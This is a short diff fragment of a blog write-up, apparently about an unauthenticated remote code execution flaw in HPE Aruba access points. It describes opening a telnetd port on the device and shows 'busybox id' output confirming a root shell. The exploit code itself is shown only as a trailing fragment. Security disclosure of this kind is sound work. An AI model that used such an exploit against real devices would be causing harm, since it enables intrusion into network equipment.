zzcentury/zzcentury.github.io/blogs/HPE_Aruba_AP_Unauthorized_RCE.md

 ''' % get_host_ip()
 ```

-This command will open a telnetd port within the device, enter the device and run /tmp/busybox id to see that we have obtained the root shell.
+This command will open a telnetd port within the device, enter the device and run /tmp/busybox id to see that we have obtained the root shell.<br>
 ```
 /tmp # /tmp/busybox id
 uid=0(root) gid=0(root)